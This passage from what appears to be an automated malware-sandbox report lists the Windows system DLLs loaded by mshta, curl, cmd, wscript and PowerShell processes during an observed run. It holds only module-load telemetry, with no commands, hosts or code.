          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
